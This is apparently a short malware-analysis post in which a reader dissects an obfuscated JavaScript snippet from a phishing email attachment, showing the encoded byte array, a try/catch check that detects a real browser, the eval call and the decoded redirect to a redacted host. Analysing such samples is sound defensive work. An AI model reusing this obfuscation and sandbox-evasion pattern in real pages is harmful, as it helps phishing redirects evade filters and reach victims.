I got this snippet in an html file attached to a phishing email.
d=document;a=[0x78,0x63,0x74,0x33,0x7f, etc...];for(i=0;i<a.length;i++){a[i]-=2;}
try{d.body++}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}
if(!zz)eval(String.fromCharCode.apply(String,a));
I’ve reformatted and annotated it for readability.
// hide redirect as ascii bytes
a = [0x78,0x63,0x74,0x33, etc...];
// "decrypt" our malicious code
// maybe this is good enough to defeat filters looking for encoded redirects?
for (i = 0; i < a.length; i++) {
a[i] -= 2;
}
//detect if we're in a real browser
try {
//throws exception because you can't increment a node
document.body++
} catch(e) {
// running in a real browser
notInBrowser = 0;
}
try {
//this throws an exception if we didn't throw an exception above
//(notInBrowser will be undefined)
notInBrowser &= 2
}
catch(e) {
notInBrowser = 1;
}
// if we are in a browser, do the redirect
// remember 0 == false and 1 == true
if (!notInBrowser) {
eval(String.fromCharCode.apply(String,a));
}
The decrypted code fed to the eval:
var1=49;
var2=var1;
if(var1==var2) {document.location="http://[redacted]:8080/forum/links/column.php";}
I’m not sure what was at the url. It was probably a phishing page or a browser exploit. If anyone can explain why they used a second try-catch instead of an if-statement, let me know.
This guy has a similar post that explains the document.body++.
http://jeffreysambells.com/2012/12/12/anatomy-of-a-hack